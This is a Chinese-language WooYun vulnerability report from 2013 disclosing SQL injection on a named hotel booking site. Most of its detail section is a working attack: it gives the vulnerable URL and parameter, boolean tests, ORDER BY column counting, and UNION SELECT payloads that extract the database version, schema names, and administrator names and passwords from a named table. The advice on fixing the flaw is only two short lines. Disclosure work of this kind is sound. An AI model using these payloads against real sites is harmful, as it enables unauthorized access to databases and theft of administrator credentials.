漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-019625
漏洞标题:旅宿网SQL注入可登录后台随意操作
相关厂商:旅宿网
漏洞作者: 微微笑
提交时间:2013-08-25 21:21
修复时间:2013-10-09 21:22
公开时间:2013-10-09 21:22
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-09: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
可能在建站的时候没有考虑过安全问题,数据库可以直接接收用户输入进行查询,没有进过任何字符过滤、条件判断等安全处理,导致SQL注入问题,可脱库。
详细说明:
1.查找注入点
http://www.pricehotel.cn/hskxread.php?id=1638
注入 效果
‘ 出错
and 1=1 正常
and 1=2 出错
结论:可注入。
2.获取数据
2.1 确定字段数
http://www.pricehotel.cn/hskxread.php?id=1638 order by 20 --
依照此方法进行如下尝试:
注入 效果
order by 20 -- 出错
order by 10 -- 正常
order by 12-- 出错
order by 11 -- 正常
结论:注入点查询的数据表有11列
2.2 获得数据显示位置
http://www.pricehotel.cn/hskxread.php?id=1638 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11 --
信息:2,3,5处可利用来显示查询到的信息。
2.3 获取数据库信息
and 1=2 union all select 1,@@version,3,4,5,6,7,8,9,10,11 --
图略
信息:数据库版本MySQL 5.5.23-log。
2.4提取目标数据
and 1=2 union all select 1,table_schema,3,4,5,6,7,8,9,10,11 from information_schema.tables—
图略
信息:information_schema数据库。
由于页面显示局限,仅能显示一条信息,不能罗列所有数据表,故采用工具。
若工具没有读出具体数据,只获取了表名、列名也可以手工注入获取数据信息。
and 1=2 union select 1,admin_pwd,admin_name,4,5,6,7,8,9,10,11 from pricehoteldb.sysadmin --
漏洞证明:
修复方案:
验证所有输入
处理特殊字符
版权声明:转载请注明来源 微微笑@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝